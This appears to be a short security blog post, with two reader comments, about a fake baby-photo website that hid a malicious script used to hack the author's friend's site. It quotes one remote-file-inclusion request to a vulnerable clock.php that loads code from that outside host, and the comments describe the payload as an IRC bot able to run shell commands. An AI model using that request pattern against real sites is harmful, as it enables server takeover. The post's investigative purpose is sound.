My Baby’s Birth

You are probably reading this post, asking yourself “why does he even let me know”. So I will start by saying that my boy had his birthday a few months ago, so this post isn’t about him, it’s completely unrelated.

It has to do with this site: http://babycaleb.fort unecity.co.uk/ (I broke the link so people do not JUST jump and go to it)

This site isn’t mine, it was used to hack a friend’s web site, so I took to myself to look into it.

This site hosts a few pictures, some are quite weird to put online (hint to: My Wifes Scar), while others are completely harmless (hint to: My baby).

The issue is not in the pictures but rather what is there and cannot be seen without doing a bit of digging.

I will give some more hints in a follow-up post, if no one else comes up with what does this site do to you.

(Another hint, the site of my friend was hacked using this link: /clock.php?arg_tmirror=http://babycaleb.fortu necity.co.uk/index.htm)

Share
  • Nicolas

    Wouah… How many hours did you spend deobfuscating this code?

    Ok, it opens a socket to a predefined list of host name on port 8080 then sends some commands which looks like IRC commands (USER, PASS, NICK). Then… well it would require a couple more hours to figure ;)

  • Nicolas

    Commands seems to be related to sending mail, browsing file system, and executing shell commands on the infected host…